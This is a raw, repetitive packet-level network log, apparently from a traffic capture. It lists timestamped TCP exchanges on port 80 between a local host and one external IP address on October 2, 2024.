                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696358919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696369886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696372032 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696397066 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696414948 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696505070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696516037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696527004 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696537971 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696547985 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696578979 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696700096 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696711063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696722031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696732044 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696733952 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696764946 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696861982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696876049 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696886063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696897030 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696908951 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696924925 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696949005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.696993113 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697029114 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697208881 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697221041 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697232008 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697244883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697254896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697256088 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697267056 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697278976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697285891 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697307110 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697340965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697352886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697365046 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697376966 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697384119 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697386980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697410107 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.697424889 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768207073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768223047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768241882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768253088 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768254995 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768263102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768276930 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768290043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768294096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768301010 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768328905 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768338919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768349886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768359900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768373013 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768399954 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768404961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768415928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768428087 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768449068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768465042 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768466949 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768477917 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768488884 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768500090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768512011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768537998 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768579006 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768589973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768599987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768624067 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768641949 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768670082 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768680096 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768692017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768701077 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768702984 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768723011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.768748999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.774894953 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.774910927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.774923086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.774960041 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.774991989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.774991989 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775003910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775015116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775027037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775029898 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775055885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775082111 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775096893 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775108099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775127888 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775146961 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775181055 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775192022 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775222063 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775310040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775321007 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775331974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775341988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775342941 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775353909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775373936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775398016 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775482893 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775495052 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775505066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775517941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775526047 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775530100 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775552034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.775566101 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781819105 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781847954 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781872034 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781888008 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781893969 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781898975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781910896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781918049 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781923056 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781936884 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781958103 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.781989098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782000065 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782022953 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782048941 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782097101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782108068 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782118082 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782134056 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782138109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782157898 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782181978 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782224894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782237053 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782260895 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782277107 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782334089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782346010 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782355070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782366037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782377005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782377005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782406092 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782483101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782494068 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782507896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782516956 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782531023 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782546043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782572031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782582998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782593012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782603979 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782620907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782685995 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782696009 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782706022 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782716036 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782718897 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782727957 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782738924 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782747984 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782748938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.782785892 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783139944 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783150911 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783160925 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783170938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783195972 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783205986 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783207893 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783207893 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783221006 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783238888 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783240080 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783250093 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783260107 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783265114 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783272028 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783296108 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783308029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783312082 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783319950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783345938 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783361912 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783454895 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783466101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783476114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783485889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783490896 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783499002 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783509970 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783551931 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783581972 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783591986 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783601999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783612013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783616066 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783636093 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783644915 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783655882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783664942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783669949 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783675909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783687115 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783696890 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783699036 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783715963 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783732891 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.783885956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784063101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784073114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784082890 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784092903 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784092903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784112930 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784113884 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784125090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784132004 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784136057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784147024 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784157038 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784157038 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784167051 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784178019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784181118 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784188986 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784199953 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.784220934 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855777025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855802059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855820894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855832100 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855839014 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855863094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855875015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855878115 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855886936 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855896950 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855915070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855925083 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855926037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855938911 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855951071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855963945 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855976105 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.855989933 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856040955 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856050968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856061935 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856086016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856086969 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856096029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856108904 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856127024 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856163025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856173038 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856190920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856205940 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856230021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856503963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856518030 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856528997 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856550932 CEST5851580192.168.2.646.8.231.109
